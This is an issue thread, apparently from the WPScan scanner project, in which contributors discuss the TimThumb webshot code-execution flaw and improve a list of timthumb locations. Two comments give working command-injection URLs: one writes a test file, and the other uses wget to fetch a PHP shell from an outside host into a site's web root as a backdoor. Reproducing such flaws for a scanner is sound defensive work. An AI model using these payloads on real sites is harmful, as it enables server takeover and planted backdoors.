Closed hexlax closed 10 years ago
Hi, the detection for this one is already in WPScan: https://github.com/wpscanteam/wpscan/commit/dd53c7b200dc12d3c0b7a3ba2b94e134cae13336 (Some details can be found here: https://github.com/wpscanteam/wpscan/issues/506)
For the vuln, payloads from all the exploits / advisories I found are wrong. I was able to reproduce the exploit with the following payload:
http://wp.lab/wordpress-3.9.1/wp-content/timthumbs/2.8.13-ws-enabled.php?webshot=1&src=http://picasa.com/$(touch$IFS/tmp/file.txt)
The major change from advisories is the value of the src param. It wasn't working with the same URL as the target, in fact you have to use an allowed site listed here (this might change depending on the version you are using): https://code.google.com/p/timthumb/source/browse/trunk/timthumb.php?r=219#131
Please also note that the path to the CutyCapt must be correct (I had to modify it in my Debian lab).
Furthermore, if you have some up to date timthumb locations, we would be interested :) (so far we have all those: https://github.com/wpscanteam/wpscan/blob/master/data/timthumbs.txt)
erwanlr, thanks for the input. As far as finding timthumbs not currently found in wpscan, I've had success with searching for "timthumb dorks" and adding those to the data/timthumbs.txt file in wpscan. I have scrubbed a couple of these dork lists for you here: http://pastebin.com/4vTS0Lnf
Great :)
Merged your list with our one and we gained around 100 locations :)
Thanks!
Sweet!! Got it working and am able to download a backdoor shell.. Attacker would need to know full path of web root (/home/user/public_html) to save shell in for this example:
http://wp.local/timthumb.php?webshot=1&src=http://picasa.com/$(wget$IFS'example.com/php_shell.txt'$IFS-O$IFS/home/user/public_html/shell.php)
I was not able to reproduce the latest Timthumb Vulnerability in lab while following the directions for enabling webshots.. Although the beta webshots feature is disabled by default and requires manual source building of CutyCapt on the server, preliminary searches of "(‘WEBSHOT_ENABLED’, true)" here on github did produce about five results.
Was anyone able to verify that this vuln exists for RCE? If so, is this on roadmap to include in future wpscan development?
Vuln announcements: http://cxsecurity.com/issue/WLB-2014060134 http://blog.sucuri.net/2014/06/timthumb-webshot-code-execution-exploit-0-day.html
Thanks for contributing to such a great tool!